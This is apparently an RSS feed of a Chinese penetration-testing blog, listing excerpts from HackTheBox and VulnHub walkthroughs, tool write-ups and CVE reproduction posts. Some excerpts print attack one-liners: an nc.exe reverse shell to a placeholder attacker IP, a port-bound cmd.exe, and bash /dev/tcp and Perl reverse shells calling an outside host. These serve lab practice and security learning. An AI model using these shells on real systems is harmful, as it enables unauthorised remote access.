https://www.icekam.com/ Recent content on IceKam`s Blog Hugo -- gohugo.io zh icekamsec@gmail.com (icekam) icekamsec@gmail.com (icekam) ©2018 - 2024, IceKam All Rights Reserved Sun, 03 May 2020 06:00:36 +0800 monthly https://www.icekam.com/post/windows-elevation-of-rights-memo/ Sun, 03 May 2020 06:00:36 +0800 icekamsec@gmail.com (icekam) Sun, 03 May 2020 06:00:36 +0800 https://www.icekam.com/post/windows-elevation-of-rights-memo/ 从RCE到Shell 在有限的解释器中获取shell： $ system("start cmd.exe /k $cmd") 将cmd绑定到端口： $ nc.exe -Lp 31337 -vv -e cmd.exe Reverse shell: $ nc.exe attacker_ip attacker_port -e cmd.exe 0：系统信息 查找已安装的软件 IceKam featured image 提权 内核 Windows 渗透测试 https://www.icekam.com/post/hugo-website-sync-to-server-and-automatically-backup-to-github/ Fri, 06 Dec 2019 22:48:00 +0800 icekamsec@gmail.com (icekam) Fri, 06 Dec 2019 22:48:00 +0800 https://www.icekam.com/post/hugo-website-sync-to-server-and-automatically-backup-to-github/ 前言 前面写了一个自动部署到服务器的脚本，参见：https://www.icekam.com/post/migrate-blogs-from- IceKam hugo vps 服务器 编程开发 https://www.icekam.com/post/buffer-overflow-memo/ Fri, 06 Dec 2019 21:43:07 +0800 icekamsec@gmail.com (icekam) Fri, 06 Dec 2019 21:43:07 +0800 https://www.icekam.com/post/buffer-overflow-memo/ 简介 这是一个缓冲区溢出 的备忘录，涵盖了常用姿势。 身份识别 第一步是识别漏洞。您可以调试该应用并使用较大的字符串对其进行模糊处理，并确定导致崩溃 IceKam Linux 提权 信息搜集 内核 渗透测试 https://www.icekam.com/post/linux-penetration-testing-escalation-notes/ Fri, 06 Dec 2019 20:43:07 +0800 icekamsec@gmail.com (icekam) Fri, 06 Dec 2019 20:43:07 +0800 https://www.icekam.com/post/linux-penetration-testing-escalation-notes/ 简介 这是一个Linux 提取的备忘录，涵盖了大部分常用姿势，本文为原创作品。 获得shell后 获得交互 Shell 1 $ python -c 'import pty;pty.spawn("/bin/bash")' 如果失败可设置PATH TER IceKam featured image Linux 提权 信息搜集 内核 渗透测试 https://www.icekam.com/post/ehtools-wifi-penetration-testing-framework/ Fri, 06 Dec 2019 19:43:07 +0800 icekamsec@gmail.com (icekam) Fri, 06 Dec 2019 19:43:07 +0800 https://www.icekam.com/post/ehtools-wifi-penetration-testing-framework/ 简介 Wi-Fi工具不断为初学者和Ehtools框架提供越来越多的访问权限。 是认真渗透工具的框架，可以从其中轻松进行探索。 这个强大而简单的工具 IceKam featured image Wifi 破解 工具资源 https://www.icekam.com/post/active-practice-record/ Wed, 06 Nov 2019 15:32:02 +0800 icekamsec@gmail.com (icekam) Wed, 06 Nov 2019 15:32:02 +0800 https://www.icekam.com/post/active-practice-record/ 环境介绍： 名称：Active 系统：Windows 信息搜集 获取目标 1 $ nmap -A 10.10.10.100 系统为Windows Server,端口53、88、135、139、 IceKam featured image Windows 靶机 john impacket hackthebox 渗透测试 https://www.icekam.com/post/bastion-practice-record/ Wed, 06 Nov 2019 14:09:02 +0800 icekamsec@gmail.com (icekam) Wed, 06 Nov 2019 14:09:02 +0800 https://www.icekam.com/post/bastion-practice-record/ 环境介绍： 名称：Bastion 系统：Windows 信息搜集 获取目标 1 $ nmap -A 10.10.10.134 系统为Windows Server,端口22、135、139、44 IceKam featured image Windows 靶机 sam hackthebox 渗透测试 https://www.icekam.com/post/access-practice-record/ Tue, 05 Nov 2019 15:09:02 +0800 icekamsec@gmail.com (icekam) Tue, 05 Nov 2019 15:09:02 +0800 https://www.icekam.com/post/access-practice-record/ 环境介绍： 名称：Access 系统：Windows 信息搜集 获取目标 1 $ nmap -A 10.10.10.93 系统为Windows Server 2008 R2 - 2012,端口21、80、telnet IceKam featured image Windows 靶机 powershell hackthebox 渗透测试 https://www.icekam.com/post/netmon-practice-record/ Mon, 04 Nov 2019 15:09:02 +0800 icekamsec@gmail.com (icekam) Mon, 04 Nov 2019 15:09:02 +0800 https://www.icekam.com/post/netmon-practice-record/ 环境介绍： 名称：Netmon 系统：Windows 信息搜集 获取目标 1 $ nmap -A 10.10.10.93 系统为Windows Server 2008 R2 - 2012,端口21、80开放，部署有P IceKam featured image Windows 靶机 PRTG impacket hackthebox 渗透测试 https://www.icekam.com/post/bounty-practice-record/ Wed, 30 Oct 2019 15:09:02 +0800 icekamsec@gmail.com (icekam) Wed, 30 Oct 2019 15:09:02 +0800 https://www.icekam.com/post/bounty-practice-record/ 环境介绍： 名称：Bounty 系统：Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 11 12 13 14 $ nmap -A 10.10.10.93 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-30 10:20 CST Nmap scan report for 10.10.10.93 Host is up (0.34s latency). IceKam featured image Windows 靶机 powershell 提权 hackthebox 渗透测试 https://www.icekam.com/post/blue-practice-record/ Tue, 29 Oct 2019 15:09:02 +0800 icekamsec@gmail.com (icekam) Tue, 29 Oct 2019 15:09:02 +0800 https://www.icekam.com/post/blue-practice-record/ 环境介绍： 名称：Blue 系统：Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 $ nmap -A 10.10.10.40 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 15:22 CST Nmap scan report for 10.10.10.40 Host is up (0.34s IceKam featured image Windows 靶机 解密 提权 hackthebox 渗透测试 https://www.icekam.com/post/granny-practice-record/ Tue, 29 Oct 2019 13:09:02 +0800 icekamsec@gmail.com (icekam) Tue, 29 Oct 2019 13:09:02 +0800 https://www.icekam.com/post/granny-practice-record/ 环境介绍： 名称：Granny 系统：Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 11 12 13 14 $ nmap -sV -O -F -oA Granny --version-light 10.10.10.15 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 14:01 CST Nmap scan report for 10.10.10.15 IceKam featured image Windows 靶机 解密 提权 hackthebox 渗透测试 https://www.icekam.com/post/grandpa-practice-record/ Tue, 29 Oct 2019 10:09:02 +0800 icekamsec@gmail.com (icekam) Tue, 29 Oct 2019 10:09:02 +0800 https://www.icekam.com/post/grandpa-practice-record/ 环境介绍： 名称：Grandpa 系统：Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 $ nmap -sV -O -F -oA Grandpa --version-light 10.10.10.14 Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 09:19 CST Nmap scan report for 10.10.10.14 Host is up IceKam featured image Windows 靶机 解密 提权 hackthebox 渗透测试 https://www.icekam.com/post/arctic-practice-record/ Mon, 28 Oct 2019 12:14:02 +0800 icekamsec@gmail.com (icekam) Mon, 28 Oct 2019 12:14:02 +0800 https://www.icekam.com/post/arctic-practice-record/ 环境介绍： 名称：Arctic 系统：Windows 信息搜集 获取目标 1 2 3 4 5 6 7 8 9 10 11 12 13 $ nmap -A 10.10.10.11 Starting Nmap 7.80 ( https://nmap.org ) at Nmap scan report for 10.10.10.11 Host is up (0.33s latency). Not shown: 997 filtered IceKam featured image Windows 靶机 解密 提权 hackthebox 渗透测试 https://www.icekam.com/post/devel-practice-record/ Thu, 24 Oct 2019 12:14:02 +0800 icekamsec@gmail.com (icekam) Thu, 24 Oct 2019 12:14:02 +0800 https://www.icekam.com/post/devel-practice-record/ 环境介绍： 名称：Devel 信息搜集 获取目标 1 2 3 4 5 6 $ nmap -sV -O -F -oA Legacy --version-light 10.10.10.5 Nmap scan report for 10.10.10.5 PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 80/tcp open http Microsoft IIS httpd 7.5 Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 IceKam Windows 靶机 解密 提权 hackthebox 渗透测试 https://www.icekam.com/post/bastard-practice-record/ Thu, 26 Sep 2019 12:14:02 +0800 icekamsec@gmail.com (icekam) Thu, 26 Sep 2019 12:14:02 +0800 https://www.icekam.com/post/bastard-practice-record/ 环境介绍： 名称：Bastard 系统：Windows 信息搜集 1 2 3 4 5 6 $ sudo nmap -sV -O -F --version-light 10.10.10.9 PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open unknown -sV：探测开 IceKam featured image Windows 靶机 提权 hackthebox 渗透测试 https://www.icekam.com/post/optimum-practice-record/ Wed, 25 Sep 2019 12:14:02 +0800 icekamsec@gmail.com (icekam) Wed, 25 Sep 2019 12:14:02 +0800 https://www.icekam.com/post/optimum-practice-record/ 环境介绍： 名称：Devel 系统：Windows 信息搜集 1 $ sudo nmap -sV -O -F --version-light 10.10.10.8 -sV：探测开放端口以确定服务/版本信息 -O：启用OS检测 -F：快速 IceKam featured image Windows 靶机 提权 hackthebox 渗透测试 https://www.icekam.com/post/legacy-practice-record-/ Wed, 18 Sep 2019 12:14:02 +0800 icekamsec@gmail.com (icekam) Wed, 18 Sep 2019 12:14:02 +0800 https://www.icekam.com/post/legacy-practice-record-/ 环境介绍： 名称：Legacy 系统：Windows 信息搜集 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $ sudo nmap -sV -O -F --version-light 10.10.10.4 Starting Nmap 7.80 ( https://nmap.org ) at 2 Nmap scan report for 10.10.10.4 Host is up IceKam Windows 靶机 提权 hackthebox 渗透测试 https://www.icekam.com/post/this-site-starts-to-use-tls-1.3-and-ecc-certificates/ Wed, 11 Sep 2019 12:14:02 +0800 icekamsec@gmail.com (icekam) Wed, 11 Sep 2019 12:14:02 +0800 https://www.icekam.com/post/this-site-starts-to-use-tls-1.3-and-ecc-certificates/ 前言： 搞了个通配符SSL证书，遂即决定小改一下。 经过调研发现 TLS 1.3 比较好，遂即采用。 因为重新颁发要重新生成 SSL 证书，调研了下发现ECC加密算法比 IceKam SSL 经验心得 https://www.icekam.com/post/sickos-1.2-practice-record-/ Fri, 06 Sep 2019 10:14:02 +0800 icekamsec@gmail.com (icekam) Fri, 06 Sep 2019 10:14:02 +0800 https://www.icekam.com/post/sickos-1.2-practice-record-/ 环境介绍： 名称：SickOs: 1.2 日期：2016年5月27日 作者：D4rk 系列：SickOs 说明： 这是来自SickOs的以下系列中的第二个并且 IceKam CTF 靶机 提权 VulnHub 渗透测试 https://www.icekam.com/post/alibaba-cloud-tencent-cloud-network-installs-the-latest-debian-10-buster/ Wed, 04 Sep 2019 13:14:02 +0800 icekamsec@gmail.com (icekam) Wed, 04 Sep 2019 13:14:02 +0800 https://www.icekam.com/post/alibaba-cloud-tencent-cloud-network-installs-the-latest-debian-10-buster/ 前言 由于国内环境及众所周知的原因，需要重装下干净的系统。 常规呢，是通过一些脚本，虽然方便但也不太可控。 经测试，本文在阿里云及腾讯云安装Deb IceKam 阿里云 Linux 经验心得 https://www.icekam.com/post/blog-august-update/ Thu, 29 Aug 2019 17:14:02 +0800 icekamsec@gmail.com (icekam) Thu, 29 Aug 2019 17:14:02 +0800 https://www.icekam.com/post/blog-august-update/ 前言 鉴于感觉博客体验不佳 遂有了更新下博客的想法 最后达到的效果还是比较好的 速度和体验都还可以 采用技术 1:换了个主题 2:服务器操作系统升级到最新 IceKam hugo 编程开发 https://www.icekam.com/post/penetration-test-against-high-intensity-random-recording/ Fri, 23 Aug 2019 08:14:02 +0800 icekamsec@gmail.com (icekam) Fri, 23 Aug 2019 08:14:02 +0800 https://www.icekam.com/post/penetration-test-against-high-intensity-random-recording/ 前言 高强度一个多星期的检查，是一个比较重要的经验历程吧，记录下。 教训 前期由于对目标把控不严，导致走了很多弯路，最后确定目标发现我搞下了几个目 IceKam 红蓝对抗 经验心得 https://www.icekam.com/post/stapler-1-practice-record/ Thu, 08 Aug 2019 18:14:02 +0800 icekamsec@gmail.com (icekam) Thu, 08 Aug 2019 18:14:02 +0800 https://www.icekam.com/post/stapler-1-practice-record/ 环境介绍： 名称：Stapler: 1 日期：2016年6月8日 作者：g0tmi1k 系列：Stapler 说明：有多种方法可以做这台机器 至少两（2） IceKam featured image CTF 靶机 解密 提权 VulnHub 渗透测试 https://www.icekam.com/post/fristileaks-1.3-vulnhub-practice-record/ Wed, 07 Aug 2019 17:14:02 +0800 icekamsec@gmail.com (icekam) Wed, 07 Aug 2019 17:14:02 +0800 https://www.icekam.com/post/fristileaks-1.3-vulnhub-practice-record/ 环境介绍： 名称：FristiLeaks：1.3 日期：2015年12月14日 作者：Ar0xA 系列：FristiLeaks 说明：一个名为Fris IceKam featured image CTF 靶机 解密 提权 VulnHub 渗透测试 https://www.icekam.com/post/kioptrix-2014-5-vulnhub-ctf-penetration-test-record/ Wed, 07 Aug 2019 10:14:02 +0800 icekamsec@gmail.com (icekam) Wed, 07 Aug 2019 10:14:02 +0800 https://www.icekam.com/post/kioptrix-2014-5-vulnhub-ctf-penetration-test-record/ 环境介绍： 名称：Kioptrix: 2014 (#5) 日期：2014年4月6日 作者：Kioptrix 系列：Kioptrix 说明：像往常一样，这个易受攻击的机 IceKam CTF 靶机 php 提权 VulnHub 渗透测试 https://www.icekam.com/post/rebound-shell-notes-under-linux/ Mon, 05 Aug 2019 10:14:02 +0800 icekamsec@gmail.com (icekam) Mon, 05 Aug 2019 10:14:02 +0800 https://www.icekam.com/post/rebound-shell-notes-under-linux/ 前言 记录一些Linux下反弹Shell的姿势，本文转载自互联网。 内容 bash版本 1 bash -i >& /dev/tcp/www.icekam.com/8080 0>&1 perl版本 1 perl -e 'use Socket;$i="www.icekam.com";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'&1 python版本 1 python -c 'import IceKam shell Linux 渗透测试 https://www.icekam.com/post/mysql-udf-privilege-notes/ Thu, 01 Aug 2019 10:14:02 +0800 icekamsec@gmail.com (icekam) Thu, 01 Aug 2019 10:14:02 +0800 https://www.icekam.com/post/mysql-udf-privilege-notes/ 前言 很久不玩提权了，练练手。 原理 udf = ‘user defined function‘，即‘用户自定义函数’。 文件后缀为‘.dll’，常用c语言编写。 通过在ud IceKam 提权 Mysql 渗透测试 https://www.icekam.com/post/hackebox-practice-recording-lame/ Tue, 30 Jul 2019 13:15:02 +0800 icekamsec@gmail.com (icekam) Tue, 30 Jul 2019 13:15:02 +0800 https://www.icekam.com/post/hackebox-practice-recording-lame/ 前言 前段时间购入了VIP，工作原因一直没来得及练手。 近期我将由简到难，争取把Hackthebox的靶机都过一遍。 信息搜集 老规矩，扫一波。 PORT STATE IceKam hackthebox 靶机 渗透测试 https://www.icekam.com/post/hackebox-practice-recording-beep/ Tue, 30 Jul 2019 13:14:02 +0800 icekamsec@gmail.com (icekam) Tue, 30 Jul 2019 13:14:02 +0800 https://www.icekam.com/post/hackebox-practice-recording-beep/ 前言 继续练，前期计划每天四个简单的。 信息搜集 老规矩，扫一波。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 IceKam hackthebox 靶机 渗透测试 https://www.icekam.com/post/three-linux-privilege-scripts/ Thu, 09 May 2019 16:04:02 +0800 icekamsec@gmail.com (icekam) Thu, 09 May 2019 16:04:02 +0800 https://www.icekam.com/post/three-linux-privilege-scripts/ Linuxprivchecker 简介 Linuxprivchecker.py - Linux权限升级检查脚本 [作者]：Mike Czumak（T_v3rn1x） 此脚本旨在在Linux机器上本地执行，以枚举基本系统信 IceKam featured image Linux 提权 信息搜集 工具资源 https://www.icekam.com/post/flask-jinja2-server-template-injection-vulnerability-recurrence-and-poc/ Tue, 07 May 2019 14:12:36 +0800 icekamsec@gmail.com (icekam) Tue, 07 May 2019 14:12:36 +0800 https://www.icekam.com/post/flask-jinja2-server-template-injection-vulnerability-recurrence-and-poc/ 介绍 Jinja2是一个现代的，设计师友好的Python模板语言，以Django的模板为蓝本。 使用可选的沙盒模板执行环境，它具有快速，广泛使用 IceKam featured image Flask Poc SQL注入 Web安全 https://www.icekam.com/post/zabbix-sql-injection-vulnerability-cve-2016-10134-recurrence-and-poc/ Mon, 06 May 2019 11:12:36 +0800 icekamsec@gmail.com (icekam) Mon, 06 May 2019 11:12:36 +0800 https://www.icekam.com/post/zabbix-sql-injection-vulnerability-cve-2016-10134-recurrence-and-poc/ 介绍 Zabbix是一个开源监控软件工具，适用于各种IT组件，包括网络，服务器，虚拟机和云服务。 Zabbix提供监控指标，其中包括网络利用率， IceKam featured image Zabbix Poc SQL注入 Web安全 https://www.icekam.com/post/thinkphp5-5.0.22-5.1.29-remote-code-execution-vulnerability-poc-recurrence/ Mon, 06 May 2019 10:32:36 +0800 icekamsec@gmail.com (icekam) Mon, 06 May 2019 10:32:36 +0800 https://www.icekam.com/post/thinkphp5-5.0.22-5.1.29-remote-code-execution-vulnerability-poc-recurrence/ 介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架，诞生于2006年初，原名FCS，2007年元旦正式更名为ThinkP IceKam featured image ThinkPHP 远程代码执行 Poc Web安全 https://www.icekam.com/post/thinkphp5-sql-injection-vulnerability-and-sensitive-information-disclosure-recurrence-poc/ Mon, 06 May 2019 10:32:36 +0800 icekamsec@gmail.com (icekam) Mon, 06 May 2019 10:32:36 +0800 https://www.icekam.com/post/thinkphp5-sql-injection-vulnerability-and-sensitive-information-disclosure-recurrence-poc/ 介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架，诞生于2006年初，原名FCS，2007年元旦正式更名为ThinkP IceKam featured image ThinkPHP 信息泄露 Poc SQL注入 Web安全 https://www.icekam.com/post/thinkphp5-5.0.23-remote-code-execution-vulnerability/ Mon, 06 May 2019 09:34:36 +0800 icekamsec@gmail.com (icekam) Mon, 06 May 2019 09:34:36 +0800 https://www.icekam.com/post/thinkphp5-5.0.23-remote-code-execution-vulnerability/ 介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架，诞生于2006年初，原名FCS，2007年元旦正式更名为ThinkP IceKam featured image ThinkPHP 远程代码执行 Web安全 https://www.icekam.com/post/blacklight-1-vulnhub-ctf-penetration-test-record/ Mon, 29 Apr 2019 05:43:36 +0000 icekamsec@gmail.com (icekam) Mon, 29 Apr 2019 05:43:36 +0000 https://www.icekam.com/post/blacklight-1-vulnhub-ctf-penetration-test-record/ 信息搜集 寻找目标 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 $ nmap -sS 10.0.2.1/24 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 12:22 CST $ nmap -A 10.0.2.7 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-16 IceKam CTF 靶机 nmap 提权 VulnHub 渗透测试 https://www.icekam.com/post/bob-vulnhub-ctf-penetration-test-record/ Mon, 29 Apr 2019 05:43:36 +0000 icekamsec@gmail.com (icekam) Mon, 29 Apr 2019 05:43:36 +0000 https://www.icekam.com/post/bob-vulnhub-ctf-penetration-test-record/ 简介 鲍勃是我的第一个CTF虚拟机，如果它不完美的话我就这么容易。 Milburg Highschool服务器刚被攻击，IT人员已经关闭了他们的Windows IceKam CTF 靶机 nmap 提权 VulnHub 渗透测试 https://www.icekam.com/post/xposed-root-anti-detection-for-android-penetration-testing/ Fri, 08 Mar 2019 20:50:02 +0800 icekamsec@gmail.com (icekam) Fri, 08 Mar 2019 20:50:02 +0800 https://www.icekam.com/post/xposed-root-anti-detection-for-android-penetration-testing/ 前言 Android渗透测试，最关键的第一步就是过应用的Xposed/root检测。 这个属于比较初期的防检测方式了，不过很有参考意义！ 环境 系统 IceKam featured image Android Xposed 移动安全 经验心得 https://www.icekam.com/post/compilation-and-decompilation-tools-for-android-penetration-testing/ Fri, 08 Mar 2019 20:07:02 +0800 icekamsec@gmail.com (icekam) Fri, 08 Mar 2019 20:07:02 +0800 https://www.icekam.com/post/compilation-and-decompilation-tools-for-android-penetration-testing/ 前言 最近在研究移动应用安全，算是这个行业的一个新兵。 一直没有更新文章是因为太忙了，现在分享一部分我最近使用的一些小工具。 编译/反编译工具 dex2jar 介 IceKam 移动安全 破解 逆向 Android 工具资源 https://www.icekam.com/post/nsa-open-source-disassembly-tool-set-ghidra-reverse-must/ Fri, 08 Mar 2019 19:26:02 +0800 icekamsec@gmail.com (icekam) Fri, 08 Mar 2019 19:26:02 +0800 https://www.icekam.com/post/nsa-open-source-disassembly-tool-set-ghidra-reverse-must/ 前言 最近在研究二进制安全，目前还属于这个领域的门外汉，NSA放出这个软件时我就试了一下，整体感觉比较流畅，就是比IDA略吃资源。 简介 Ghid IceKam featured image 逆向 破解 反汇编 工具资源 https://www.icekam.com/post/debian9-docker-deploys-seafile-cloud-pro-and-solves-port-csrf-issues/ Tue, 12 Feb 2019 16:59:03 +0800 icekamsec@gmail.com (icekam) Tue, 12 Feb 2019 16:59:03 +0800 https://www.icekam.com/post/debian9-docker-deploys-seafile-cloud-pro-and-solves-port-csrf-issues/ 前言 马上要开年工作了，目测以后折腾时间会有所缩减，本年度立的flag也是打算给大家分享点干货，就抽个时间把网盘做出来了。 前期测试了nextc IceKam featured image Docker Linux 经验心得 https://www.icekam.com/post/appweb-authentication-bypass-vulnerability-cve-2018-8715-recurrence/ Tue, 12 Feb 2019 05:41:10 +0800 icekamsec@gmail.com (icekam) Tue, 12 Feb 2019 05:41:10 +0800 https://www.icekam.com/post/appweb-authentication-bypass-vulnerability-cve-2018-8715-recurrence/ Appweb介绍 Appweb是最快的嵌入式Web服务器，用于安全地托管物联网的嵌入式Web管理应用程序。凭借HTTP/2支持，它速度极快，具 IceKam featured image Bypass CVE Web安全 https://www.icekam.com/post/science-internet-configuration-under-manjoro-linux/ Tue, 12 Feb 2019 05:05:23 +0800 icekamsec@gmail.com (icekam) Tue, 12 Feb 2019 05:05:23 +0800 https://www.icekam.com/post/science-internet-configuration-under-manjoro-linux/ 前言 使用Manjoro Linux有一段时间了，发现网络方面有一些问题，遂记录下供大家参考。 git加速 1 2 sudo git config --global http.proxy 'socks5://127.0.0.1:1081' sudo git config --global https.proxy 'socks5://127.0.0.1:1081' 1 2 sudo git config --global IceKam Manjoro Linux 科学上网 经验心得 https://www.icekam.com/post/activemq-deserialization-vulnerability-cve-2015-5254-practice-record/ Tue, 29 Jan 2019 22:34:36 +0800 icekamsec@gmail.com (icekam) Tue, 29 Jan 2019 22:34:36 +0800 https://www.icekam.com/post/activemq-deserialization-vulnerability-cve-2015-5254-practice-record/ 简介 Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Fram IceKam ActiveMQ 反序列化 CVE Web安全 https://www.icekam.com/post/wfuzz-web-blasting-and-exhaustive-tools/ Tue, 29 Jan 2019 21:43:07 +0800 icekamsec@gmail.com (icekam) Tue, 29 Jan 2019 21:43:07 +0800 https://www.icekam.com/post/wfuzz-web-blasting-and-exhaustive-tools/ 简介 Wfuzz的创建是为了促进Web应用程序评估中的任务，它基于一个简单的概念：它用给定有效负载的值替换对FUZZ关键字的任何引用。 Wfuz IceKam 爆破 穷举 Manjoro 工具资源 https://www.icekam.com/post/oh-my-zsh-plugin-configuration-under-manjoro-linux/ Sat, 26 Jan 2019 13:20:47 +0800 icekamsec@gmail.com (icekam) Sat, 26 Jan 2019 13:20:47 +0800 https://www.icekam.com/post/oh-my-zsh-plugin-configuration-under-manjoro-linux/ Oh My Zsh 介绍 Oh My Zsh是一个zsh的扩展脚本或者插件，通过他的一些插件美化与提升zsh的效率。 Oh My Zsh效果。 环境 Manjoro Linux 插件地址：https:/ IceKam featured image Manjoro Linux 经验心得 https://www.icekam.com/post/built-in-environment-and-optimization-for-penetration-testing-under-manjoro-linux/ Wed, 23 Jan 2019 12:59:35 +0800 icekamsec@gmail.com (icekam) Wed, 23 Jan 2019 12:59:35 +0800 https://www.icekam.com/post/built-in-environment-and-optimization-for-penetration-testing-under-manjoro-linux/ 前言 以前是日常使用Kali Linux。 在漫长的使用中重装N次，严重影响效率。 遂有了换一个发行版本的想法。 Debian系都试了，感觉还是差点意 IceKam featured image Manjoro Linux 经验心得 https://www.icekam.com/post/hugo-automated-deployment-to-vps-server/ Tue, 22 Jan 2019 12:48:00 +0800 icekamsec@gmail.com (icekam) Tue, 22 Jan 2019 12:48:00 +0800 https://www.icekam.com/post/hugo-automated-deployment-to-vps-server/ 前言 博客部署到Github后发现有一些速度的问题。 遂开了台vps。 个人比较懒，如果通过传统的传输到vps比较麻烦。 最终写了一个小的脚本使每次 IceKam hugo vps 服务器 编程开发 https://www.icekam.com/post/migrate-blogs-from-hexo-to-hugo/ Mon, 21 Jan 2019 13:42:02 +0800 icekamsec@gmail.com (icekam) Mon, 21 Jan 2019 13:42:02 +0800 https://www.icekam.com/post/migrate-blogs-from-hexo-to-hugo/ 前言 博客才区区几十篇文章，hexo的生成效率较低，导致更新缓慢。 测试多个系统，如wordpress，hogo等，最终选择了hugo。 优点 生成 IceKam hugo hexo wordpress 经验心得 https://www.icekam.com/post/goldeneye-1-vulnhub-ctf-penetration-test-record/ Fri, 16 Nov 2018 15:10:22 +0000 icekamsec@gmail.com (icekam) Fri, 16 Nov 2018 15:10:22 +0000 https://www.icekam.com/post/goldeneye-1-vulnhub-ctf-penetration-test-record/ 简介 我最近完成了创建一个OSCP类型的易受攻击的机器，该机器以伟大的詹姆斯邦德电影（甚至更好的n64游戏）GoldenEye为主题。目标是获 IceKam CTF hydra 逆向 破解 VulnHub 渗透测试 https://www.icekam.com/post/bloodhound-internal-network-penetration-ad-domain-relationship-analysis-and-attack-tool/ Thu, 15 Nov 2018 14:22:01 +0000 icekamsec@gmail.com (icekam) Thu, 15 Nov 2018 14:22:01 +0000 https://www.icekam.com/post/bloodhound-internal-network-penetration-ad-domain-relationship-analysis-and-attack-tool/ 前言 最近在学习延伸内网的渗透测试，发现一个比较方便的ad域信息分析和攻击的工具BloodHound，老外用得挺多的，我个人也感觉这个工具比较 IceKam 内网渗透 AD 信息分析 工具资源 https://www.icekam.com/post/bulldog-2-drone-exercise-record/ Thu, 15 Nov 2018 14:22:01 +0000 icekamsec@gmail.com (icekam) Thu, 15 Nov 2018 14:22:01 +0000 https://www.icekam.com/post/bulldog-2-drone-exercise-record/ Name: Bulldog: 2 Date release: 18 Jul 2018 自 Bulldog Industries 遭遇多次数据泄露以来已过去三年。 在那段时间里，他们已经恢复并重新命名为 Bulldog.social，一家即将上任的社交 IceKam CTF 靶机 nmap 提权 VulnHub 渗透测试 https://www.icekam.com/post/windows-internal-network-penetration-common-command-memorandum/ Wed, 14 Nov 2018 10:08:22 +0000 icekamsec@gmail.com (icekam) Wed, 14 Nov 2018 10:08:22 +0000 https://www.icekam.com/post/windows-internal-network-penetration-common-command-memorandum/ 介绍 常用Linux，对Windows系列命令有点生疏了，所以找了个常用的命令看看，本文收集自互联网。 域常用操作命令： net group /domain //获得所有域用户 IceKam Windows 内网渗透 工控安全 路由器 渗透测试 https://www.icekam.com/post/python-development-environment-suite-anaconda/ Tue, 13 Nov 2018 09:05:08 +0000 icekamsec@gmail.com (icekam) Tue, 13 Nov 2018 09:05:08 +0000 https://www.icekam.com/post/python-development-environment-suite-anaconda/ 介绍 Anaconda®是一个包管理器，一个环境管理器，一个Python发行版，以及超过1,500多个开源软件包的集合。 下载地址 下载地址：ht IceKam Python 编程开发 https://www.icekam.com/post/pikarma-false-wireless-ap-detection-tool/ Mon, 12 Nov 2018 17:19:04 +0000 icekamsec@gmail.com (icekam) Mon, 12 Nov 2018 17:19:04 +0000 https://www.icekam.com/post/pikarma-false-wireless-ap-detection-tool/ 简介 PiKarma：检测由KARMA模块（假AP）执行的无线网络攻击。启动解除身份验证攻击（对于虚假接入点）。 PiKarma的工作原理 收集来 IceKam 无线安全 wifi 审计 工具资源 https://www.icekam.com/post/pisavar-wireless-audit-detection-tool/ Mon, 12 Nov 2018 17:15:36 +0000 icekamsec@gmail.com (icekam) Mon, 12 Nov 2018 17:15:36 +0000 https://www.icekam.com/post/pisavar-wireless-audit-detection-tool/ 关于项目 该项目的目标是找出WiFi Pineapple设备使用PineAP模块打开的虚假接入点，并通过向攻击设备发起解除认证攻击来防止客户端受 IceKam 无线安全 wifi 审计 工具资源 https://www.icekam.com/post/pidense-illegal-wireless-network-monitoring-tool/ Mon, 12 Nov 2018 16:38:20 +0000 icekamsec@gmail.com (icekam) Mon, 12 Nov 2018 16:38:20 +0000 https://www.icekam.com/post/pidense-illegal-wireless-network-monitoring-tool/ 简介 PiDense监控非法的无线网络活动。（虚假接入点），（WiFi威胁：KARMA攻击，WiFi Pineapple，Similar SSID IceKam 无线安全 wifi 审计 工具资源 https://www.icekam.com/post/leviathan-network-security-audit-tool/ Mon, 12 Nov 2018 16:22:07 +0000 icekamsec@gmail.com (icekam) Mon, 12 Nov 2018 16:22:07 +0000 https://www.icekam.com/post/leviathan-network-security-audit-tool/ 简介 Leviathan是一个大规模审计工具包，具有广泛的服务发现，强力，SQ​​L注入检测和运行自定义漏洞利用功能。 它包含开源工具，如mas IceKam 爆破 远程命令执行 SQL注入 审计 工具资源 https://www.icekam.com/post/matrix-1-vulnhub-ctf-penetration-test-record/ Sat, 10 Nov 2018 08:57:10 +0000 icekamsec@gmail.com (icekam) Sat, 10 Nov 2018 08:57:10 +0000 https://www.icekam.com/post/matrix-1-vulnhub-ctf-penetration-test-record/ 介绍 描述：Matrix是一个中级boot2root挑战。OVA已经在VMware和Virtual Box上进行了测试。 难度：中级 标志：你的目标 IceKam CTF john nmap 提权 VulnHub 渗透测试 https://www.icekam.com/post/linux-right-information-collection-artifact-linenum/ Fri, 09 Nov 2018 11:49:51 +0000 